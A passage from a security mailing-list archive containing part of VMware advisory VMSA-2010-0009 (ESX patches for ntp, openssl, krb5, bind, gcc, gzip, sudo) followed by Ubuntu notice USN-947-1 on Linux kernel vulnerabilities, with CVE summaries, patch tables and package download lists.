vMA            4.0       RHEL5    affected, patch pending
  • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

b. ESXi userworld update for ntp

The Network Time Protocol (NTP) is used to synchronize the time of
a computer client or server to another server or reference time
source.

A vulnerability in ntpd could allow a remote attacker to cause a
denial of service (CPU and bandwidth consumption) by using
MODE_PRIVATE to send a spoofed (1) request or (2) response packet
that triggers a continuous exchange of MODE_PRIVATE error responses
between two NTP daemons.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2009-3563 to this issue.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
VirtualCenter  any       Windows  not affected

hosted *       any       any      not affected

ESXi           4.0       ESXi     ESXi400-201005401-SG
ESXi           3.5       ESXi     affected, patch pending

ESX            any       ESX      not applicable

vMA            any       RHEL5    not applicable
  • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

c. Service Console package openssl updated to 0.9.8e-12.el5_4.1

OpenSSL is a toolkit implementing SSL v2/v3 and TLS protocols with
full-strength cryptography world-wide.

A memory leak in the zlib could allow a remote attacker to cause a
denial of service (memory consumption) via vectors that trigger
incorrect calls to the CRYPTO_cleanup_all_ex_data function.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2009-4355 to this issue.

A vulnerability was discovered which may allow remote attackers to
spoof certificates by using MD2 design flaws to generate a hash
collision in less than brute-force time. NOTE: the scope of this
issue is currently limited because the amount of computation
required is still large.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2009-2409 to this issue.

This update also includes security fixes that were first addressed
in version openssl-0.9.8e-12.el5.i386.rpm.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the names CVE-2009-0590, CVE-2009-1377, CVE-2009-1378,
CVE-2009-1379, CVE-2009-1386 and CVE-2009-1387 to these issues.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
VirtualCenter  any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.0       ESX      ESX400-201005401-SG
ESX            3.5       ESX      not applicable
ESX            3.0.3     ESX      not applicable
ESX            2.5.5     ESX      not applicable

vMA            4.0       RHEL5    affected, patch pending**
  • hosted products are VMware Workstation, Player, ACE, Server, Fusion. ** see VMSA-2010-0004

d. Service Console update for krb5 to 1.6.1-36.el5_4.1 and pam_krb5 to 2.2.14-15.

Kerberos is a network authentication protocol. It is designed to
provide strong authentication for client/server applications by
using secret-key cryptography.

Multiple integer underflows in the AES and RC4 functionality in the
crypto library could allow remote attackers to cause a denial of
service (daemon crash) or possibly execute arbitrary code by
providing ciphertext with a length that is too short to be valid.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2009-4212 to this issue.

The service console package for pam_krb5 is updated to version
pam_krb5-2.2.14-15. This update fixes a flaw found in pam_krb5. In
some non-default configurations (specifically, where pam_krb5 would
be the first module to prompt for a password), a remote attacker
could use this flaw to recognize valid usernames, which would aid a
dictionary-based password guess attack.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2009-1384 to this issue.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
VirtualCenter  any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.0       ESX      ESX400-201005406-SG
ESX            3.5       ESX      affected, patch pending
ESX            3.0.3     ESX      affected, patch pending
ESX            2.5.5     ESX      affected, patch pending

vMA            4.0       RHEL5    affected, patch pending
  • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

e. Service Console package bind updated to 9.3.6-4.P1.el5_4.2

BIND (Berkeley Internet Name Daemon) is by far the most widely used
Domain Name System (DNS) software on the Internet.

A vulnerability was discovered which could allow remote attacker to
add the Authenticated Data (AD) flag to a forged NXDOMAIN response
for an existing domain.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2010-0097 to this issue.

A vulnerability was discovered which could allow remote attackers
to conduct DNS cache poisoning attacks by receiving a recursive
client query and sending a response that contains CNAME or DNAME
records, which do not have the intended validation before caching.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2010-0290 to this issue.

A vulnerability was found in the way that bind handles out-of-
bailiwick data accompanying a secure response without re-fetching
from the original source, which could allow remote attackers to
have an unspecified impact via a crafted response.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2010-0382 to this issue.

NOTE: ESX does not use the BIND name service daemon by default.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
VirtualCenter  any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.0       ESX      ESX400-201005408-SG
ESX            3.5       ESX      not applicable
ESX            3.0.3     ESX      not applicable
ESX            2.5.5     ESX      not applicable

vMA            4.0       RHEL5    affected, patch pending
  • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

f. Service Console package gcc updated to 3.2.3-60

The GNU Compiler Collection includes front ends for C, C++,
Objective-C, Fortran, Java, and Ada, as well as libraries for these
languages

GNU Libtool's ltdl.c attempts to open .la library files in the
current working directory.  This could allow a local user to gain
privileges via a Trojan horse file.  The GNU C Compiler collection
(gcc) provided in ESX contains a statically linked version of the
vulnerable code, and is being replaced.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2009-3736 to this issue.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
VirtualCenter  any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not applicable

ESX            4.0       ESX      ESX400-201005407-SG
ESX            3.5       ESX      affected, patch pending
ESX            3.0.3     ESX      affected, patch pending
ESX            2.5.5     ESX      affected, patch pending

vMA            4.0       RHEL5    affected, patch pending
  • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

g. Service Console package gzip update to 1.3.3-15.rhel3

gzip is a software application used for file compression

An integer underflow in gzip's unlzw function on 64-bit platforms
may allow a remote attacker to trigger an array index error
leading to a denial of service (application crash) or possibly
execute arbitrary code via a crafted LZW compressed file.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2010-0001 to this issue.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
VirtualCenter  any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.0       ESX      ESX400-201005405-SG
ESX            3.5       ESX      affected, patch pending
ESX            3.0.3     ESX      affected, patch pending
ESX            2.5.5     ESX      affected, patch pending

vMA            4.0       RHEL5    affected, patch pending
  • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

h. Service Console package sudo updated to 1.6.9p17-6.el5_4

Sudo (su "do") allows a system administrator to delegate authority
to give certain users (or groups of users) the ability to run some
(or all) commands as root or another user while providing an audit
trail of the commands and their arguments.

When a pseudo-command is enabled, sudo permits a match between the
name of the pseudo-command and the name of an executable file in an
arbitrary directory, which allows local users to gain privileges
via a crafted executable file.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2010-0426 to this issue.

When the runas_default option is used, sudo does not properly set
group memberships, which allows local users to gain privileges via
a sudo command.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2010-0427 to this issue.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
VirtualCenter  any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.0       ESX      ESX400-201005409-SG
ESX            3.5       ESX      not applicable
ESX            3.0.3     ESX      not applicable
ESX            2.5.5     ESX      not applicable

vMA            4.0       RHEL5    affected, patch pending
  • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

  • Solution

Please review the patch/release notes for your product and version and verify the md5sum of your downloaded file.

ESX 4.0


http://bit.ly/aqTCqn md5sum: ace37cd8d7c6388edcea2798ba8be939 sha1sum: 8fe7312fe74a435e824d879d4f1ff33df25cee78 http://kb.vmware.com/kb/1013127

Note ESX400-201005001 contains the following security bulletins ESX400-201005404-SG (ntp), ESX400-201005405-SG (gzip), ESX400-201005408-SG (bind), ESX400-201005401-SG (kernel, openssl), ESX400-201005406-SG (krb5, pam_krb5), ESX400-201005402-SG (JRE), ESX400-201005403-SG (expat), ESX400-201005409-SG (sudo), ESX400-201005407-SG (gcc).

  1. References

CVE numbers http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2695 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2908 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3228 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3286 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3547 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3613 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3612 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3620 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3621 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3726 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4567 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4536 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4537 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4538 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6304 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2910 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3080 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3556 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3889 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3939 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4020 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4021 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4138 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4141 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4272 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3563 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4355 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2409 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0590 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1377 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1378 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1379 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1386 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1387 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4212 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1384 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0097 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0290 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3736 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0001 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0426 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0427 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0382


  1. Change log

2010-05-27 VMSA-2010-0009 Initial security advisory after release of patch 06 bulletins for ESX 4.0 on 2010-05-27


  1. Contact

E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce

This Security Advisory is posted to the following lists:

  • security-announce at lists.vmware.com
  • bugtraq at securityfocus.com
  • full-disclosure at lists.grok.org.uk

E-mail: security at vmware.com PGP key at: http://kb.vmware.com/kb/1055

VMware Security Center http://www.vmware.com/security

VMware security response policy http://www.vmware.com/support/policies/security_response.html

General support life cycle policy http://www.vmware.com/support/policies/eos.html

VMware Infrastructure support life cycle policy http://www.vmware.com/support/policies/eos_vi.html

Copyright 2010 VMware Inc. All rights reserved.

-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (MingW32)

iEYEARECAAYFAkv/V8IACgkQS2KysvBH1xnqNgCcCwwelsQK6DQjcTc2wnIPp0EW E70An2gfkiCQ5FNqvf3y+kNredxyVZwI =JW3s -----END PGP SIGNATURE----- . =========================================================== Ubuntu Security Notice USN-947-1 June 03, 2010 linux, linux-source-2.6.15 vulnerabilities CVE-2009-4271, CVE-2009-4537, CVE-2010-0008, CVE-2010-0298, CVE-2010-0306, CVE-2010-0419, CVE-2010-0437, CVE-2010-0727, CVE-2010-0741, CVE-2010-1083, CVE-2010-1084, CVE-2010-1085, CVE-2010-1086, CVE-2010-1087, CVE-2010-1088, CVE-2010-1146, CVE-2010-1148, CVE-2010-1162, CVE-2010-1187, CVE-2010-1188, CVE-2010-1488 ===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS Ubuntu 8.04 LTS Ubuntu 9.04 Ubuntu 9.10 Ubuntu 10.04 LTS

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.06 LTS: linux-image-2.6.15-55-386 2.6.15-55.84 linux-image-2.6.15-55-686 2.6.15-55.84 linux-image-2.6.15-55-amd64-generic 2.6.15-55.84 linux-image-2.6.15-55-amd64-k8 2.6.15-55.84 linux-image-2.6.15-55-amd64-server 2.6.15-55.84 linux-image-2.6.15-55-amd64-xeon 2.6.15-55.84 linux-image-2.6.15-55-hppa32 2.6.15-55.84 linux-image-2.6.15-55-hppa32-smp 2.6.15-55.84 linux-image-2.6.15-55-hppa64 2.6.15-55.84 linux-image-2.6.15-55-hppa64-smp 2.6.15-55.84 linux-image-2.6.15-55-itanium 2.6.15-55.84 linux-image-2.6.15-55-itanium-smp 2.6.15-55.84 linux-image-2.6.15-55-k7 2.6.15-55.84 linux-image-2.6.15-55-mckinley 2.6.15-55.84 linux-image-2.6.15-55-mckinley-smp 2.6.15-55.84 linux-image-2.6.15-55-powerpc 2.6.15-55.84 linux-image-2.6.15-55-powerpc-smp 2.6.15-55.84 linux-image-2.6.15-55-powerpc64-smp 2.6.15-55.84 linux-image-2.6.15-55-server 2.6.15-55.84 linux-image-2.6.15-55-server-bigiron 2.6.15-55.84 linux-image-2.6.15-55-sparc64 2.6.15-55.84 linux-image-2.6.15-55-sparc64-smp 2.6.15-55.84

Ubuntu 8.04 LTS: linux-image-2.6.24-28-386 2.6.24-28.70 linux-image-2.6.24-28-generic 2.6.24-28.70 linux-image-2.6.24-28-hppa32 2.6.24-28.70 linux-image-2.6.24-28-hppa64 2.6.24-28.70 linux-image-2.6.24-28-itanium 2.6.24-28.70 linux-image-2.6.24-28-lpia 2.6.24-28.70 linux-image-2.6.24-28-lpiacompat 2.6.24-28.70 linux-image-2.6.24-28-mckinley 2.6.24-28.70 linux-image-2.6.24-28-openvz 2.6.24-28.70 linux-image-2.6.24-28-powerpc 2.6.24-28.70 linux-image-2.6.24-28-powerpc-smp 2.6.24-28.70 linux-image-2.6.24-28-powerpc64-smp 2.6.24-28.70 linux-image-2.6.24-28-rt 2.6.24-28.70 linux-image-2.6.24-28-server 2.6.24-28.70 linux-image-2.6.24-28-sparc64 2.6.24-28.70 linux-image-2.6.24-28-sparc64-smp 2.6.24-28.70 linux-image-2.6.24-28-virtual 2.6.24-28.70 linux-image-2.6.24-28-xen 2.6.24-28.70

Ubuntu 9.04: linux-image-2.6.28-19-generic 2.6.28-19.61 linux-image-2.6.28-19-imx51 2.6.28-19.61 linux-image-2.6.28-19-iop32x 2.6.28-19.61 linux-image-2.6.28-19-ixp4xx 2.6.28-19.61 linux-image-2.6.28-19-lpia 2.6.28-19.61 linux-image-2.6.28-19-server 2.6.28-19.61 linux-image-2.6.28-19-versatile 2.6.28-19.61 linux-image-2.6.28-19-virtual 2.6.28-19.61

Ubuntu 9.10: linux-image-2.6.31-112-imx51 2.6.31-112.28 linux-image-2.6.31-214-dove 2.6.31-214.28 linux-image-2.6.31-214-dove-z0 2.6.31-214.28 linux-image-2.6.31-22-386 2.6.31-22.60 linux-image-2.6.31-22-generic 2.6.31-22.60 linux-image-2.6.31-22-generic-pae 2.6.31-22.60 linux-image-2.6.31-22-ia64 2.6.31-22.60 linux-image-2.6.31-22-lpia 2.6.31-22.60 linux-image-2.6.31-22-powerpc 2.6.31-22.60 linux-image-2.6.31-22-powerpc-smp 2.6.31-22.60 linux-image-2.6.31-22-powerpc64-smp 2.6.31-22.60 linux-image-2.6.31-22-server 2.6.31-22.60 linux-image-2.6.31-22-sparc64 2.6.31-22.60 linux-image-2.6.31-22-sparc64-smp 2.6.31-22.60 linux-image-2.6.31-22-virtual 2.6.31-22.60 linux-image-2.6.31-307-ec2 2.6.31-307.15

Ubuntu 10.04 LTS: linux-image-2.6.31-608-imx51 2.6.31-608.14 linux-image-2.6.31-802-st1-5 2.6.31-802.4 linux-image-2.6.32-205-dove 2.6.32-205.18 linux-image-2.6.32-22-386 2.6.32-22.35 linux-image-2.6.32-22-386-dbgsym 2.6.32-22.35 linux-image-2.6.32-22-generic 2.6.32-22.35 linux-image-2.6.32-22-generic-dbgsym 2.6.32-22.35 linux-image-2.6.32-22-generic-pae 2.6.32-22.35 linux-image-2.6.32-22-generic-pae-dbgsym 2.6.32-22.35 linux-image-2.6.32-22-ia64 2.6.32-22.35 linux-image-2.6.32-22-ia64-dbgsym 2.6.32-22.35 linux-image-2.6.32-22-lpia 2.6.32-22.35 linux-image-2.6.32-22-lpia-dbgsym 2.6.32-22.35 linux-image-2.6.32-22-powerpc 2.6.32-22.35 linux-image-2.6.32-22-powerpc-dbgsym 2.6.32-22.35 linux-image-2.6.32-22-powerpc-smp 2.6.32-22.35 linux-image-2.6.32-22-powerpc-smp-dbgsym 2.6.32-22.35 linux-image-2.6.32-22-powerpc64-smp 2.6.32-22.35 linux-image-2.6.32-22-powerpc64-smp-dbgsym 2.6.32-22.35 linux-image-2.6.32-22-preempt 2.6.32-22.35 linux-image-2.6.32-22-preempt-dbgsym 2.6.32-22.35 linux-image-2.6.32-22-server 2.6.32-22.35 linux-image-2.6.32-22-server-dbgsym 2.6.32-22.35 linux-image-2.6.32-22-sparc64 2.6.32-22.35 linux-image-2.6.32-22-sparc64-dbgsym 2.6.32-22.35 linux-image-2.6.32-22-sparc64-smp 2.6.32-22.35 linux-image-2.6.32-22-sparc64-smp-dbgsym 2.6.32-22.35 linux-image-2.6.32-22-versatile 2.6.32-22.35 linux-image-2.6.32-22-versatile-dbgsym 2.6.32-22.35 linux-image-2.6.32-22-virtual 2.6.32-22.35 linux-image-2.6.32-306-ec2 2.6.32-306.11 linux-image-2.6.33-501-omap 2.6.33-501.7

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-server, linux-powerpc), a standard system upgrade will automatically perform this as well.

Details follow:

It was discovered that the Linux kernel did not correctly handle memory protection of the Virtual Dynamic Shared Object page when running a 32-bit application on a 64-bit kernel. (Only affected Ubuntu 6.06 LTS.) (CVE-2009-4271)

It was discovered that the r8169 network driver did not correctly check the size of Ethernet frames. A remote attacker could send specially crafted traffic to crash the system, leading to a denial of service. (CVE-2009-4537)

Wei Yongjun discovered that SCTP did not correctly validate certain chunks. A remote attacker could send specially crafted traffic to monopolize CPU resources, leading to a denial of service. (Only affected Ubuntu 6.06 LTS.) (CVE-2010-0008)

It was discovered that KVM did not correctly limit certain privileged IO accesses on x86. Processes in the guest OS with access to IO regions could gain further privileges within the guest OS. (Did not affect Ubuntu 6.06 LTS.) (CVE-2010-0298, CVE-2010-0306, CVE-2010-0419)

Evgeniy Polyakov discovered that IPv6 did not correctly handle certain TUN packets. (Only affected Ubuntu 8.04 LTS.) (CVE-2010-0437)

Sachin Prabhu discovered that GFS2 did not correctly handle certain locks. A local attacker with write access to a GFS2 filesystem could exploit this to crash the system, leading to a denial of service. (CVE-2010-0727)

Jamie Strandboge discovered that network virtio in KVM did not correctly handle certain high-traffic conditions. A remote attacker could exploit this by sending specially crafted traffic to a guest OS, causing the guest to crash, leading to a denial of service. (Only affected Ubuntu 8.04 LTS.) (CVE-2010-0741)

Marcus Meissner discovered that the USB subsystem did not correctly handle certain error conditions. A local attacker with access to a USB device could exploit this to read recently used kernel memory, leading to a loss of privacy and potentially root privilege escalation. (CVE-2010-1083)

Neil Brown discovered that the Bluetooth subsystem did not correctly handle large amounts of traffic. (Ubuntu 6.06 LTS and 10.04 LTS were not affected.) (CVE-2010-1084)

Jody Bruchon discovered that the sound driver for the AMD780V did not correctly handle certain conditions. (CVE-2010-1085)

Ang Way Chuang discovered that the DVB driver did not correctly handle certain MPEG2-TS frames. An attacker could exploit this by delivering specially crafted frames to monopolize CPU resources, leading to a denial of service. (Ubuntu 10.04 LTS was not affected.) (CVE-2010-1086)

Trond Myklebust discovered that NFS did not correctly handle truncation under certain conditions. A local attacker with write access to an NFS share could exploit this to crash the system, leading to a denial of service. (Ubuntu 10.04 LTS was not affected.) (CVE-2010-1087)

Al Viro discovered that automount of NFS did not correctly handle symlinks under certain conditions. (Ubuntu 6.06 LTS and Ubuntu 10.04 LTS were not affected.) (CVE-2010-1088)

Matt McCutchen discovered that ReiserFS did not correctly protect xattr files in the .reiserfs_priv directory. (CVE-2010-1146)

Eugene Teo discovered that CIFS did not correctly validate arguments when creating new files. A local attacker could exploit this to crash the system, leading to a denial of service, or possibly gain root privileges if mmap_min_addr was not set. (CVE-2010-1148)

Catalin Marinas and Tetsuo Handa discovered that the TTY layer did not correctly release process IDs. (CVE-2010-1162)

Neil Horman discovered that TIPC did not correctly check its internal state. A local attacker could send specially crafted packets via AF_TIPC that would cause the system to crash, leading to a denial of service. (Ubuntu 6.06 LTS was not affected.) (CVE-2010-1187)

Masayuki Nakagawa discovered that IPv6 did not correctly handle certain settings when listening. (Only Ubuntu 6.06 LTS was affected.) (CVE-2010-1188)

Oleg Nesterov discovered that the Out-Of-Memory handler did not correctly handle certain arrangements of processes. (CVE-2010-1488)

Updated packages for Ubuntu 6.06 LTS:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.84.diff.gz
  Size/MD5:  2960435 33b09ecaf8a52ac8518c34163d53c5ef
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.84.dsc
  Size/MD5:     2439 ddd8f898074d4b56e18fa00cecaed4d9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15.orig.tar.gz
  Size/MD5: 57403387 88ab0747cb8c2ceed662e0fd1b27d81d

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-doc-2.6.15_2.6.15-55.84_all.deb
  Size/MD5:  5166142 6bb2a7cc886f5f258e598f8257386c4c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-kernel-devel_2.6.15-55.84_all.deb
  Size/MD5:    96900 4d56e3ffc13abbd559252d961582928e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.84_all.deb
  Size/MD5: 44742758 a29467cb2571e45b5ba4cc52f49d402e

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:    22344 22df0e2142b58bfc5089997ba68f8a32
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:    44772 e38fce9b303eb280f9de5b6bf4321539
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:     2312 519dde14b25bcb6f72b50b10fb2b8c42
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:    36298 529530b75bc9d308a36945e253829337
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:   102370 db98ff5f9e6e356af90422da4190fcba
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:    38890 0d2cb99466cf014ba83ad3a38cd759f1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:    49144 7e51d739d81751a717fd33393d9b5698
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:   176620 61c26ebee2f9b56ab2ae781caaa78f16
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:    36774 32797f4fc4204eeb5185a17019dc5cd2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:   142346 50314cb83693e27a2f515836bfb81adf
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:    51062 c7f26b13e057743d95d90c6ed1feb7be
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:   140712 60824c117e8e10faa8502405dc64b756
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:   287612 e599c71e4f9f791bfcbb5a8e148fa02d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:    97832 923d2dbedfa2bb0ce20db2af510ec3ae
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:  1652310 a49bd3692b26b2776eddd3218049ad31
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-generic_2.6.15-55.84_amd64.deb
  Size/MD5:   869218 c54b14fff14e6f36a6f5424bf28ba5ba
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-k8_2.6.15-55.84_amd64.deb
  Size/MD5:   868510 e7741f1995f864eea030c242abac8085
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-server_2.6.15-55.84_amd64.deb
  Size/MD5:   871276 ad7e3f9695e48c13d78024d9cebb4bdc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-xeon_2.6.15-55.84_amd64.deb
  Size/MD5:   870704 c3dd9b5335fa41ab82df7f691cee2a46
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.84_amd64.deb
  Size/MD5:  6925588 e85a966dd3fd31a092a504e4c4383820
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-generic_2.6.15-55.84_amd64.deb
  Size/MD5: 20817472 f8e7d44b2a3bd9dc72917fd16c2628ff
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-k8_2.6.15-55.84_amd64.deb
  Size/MD5: 20798306 fe88a926a6ce4b4465ad88a493a48357
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-server_2.6.15-55.84_amd64.deb
  Size/MD5: 21635330 8174ddfff1140d94b76678739c9f15c2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-xeon_2.6.15-55.84_amd64.deb
  Size/MD5: 19905746 58501fc8aca4794202804578b4e29415
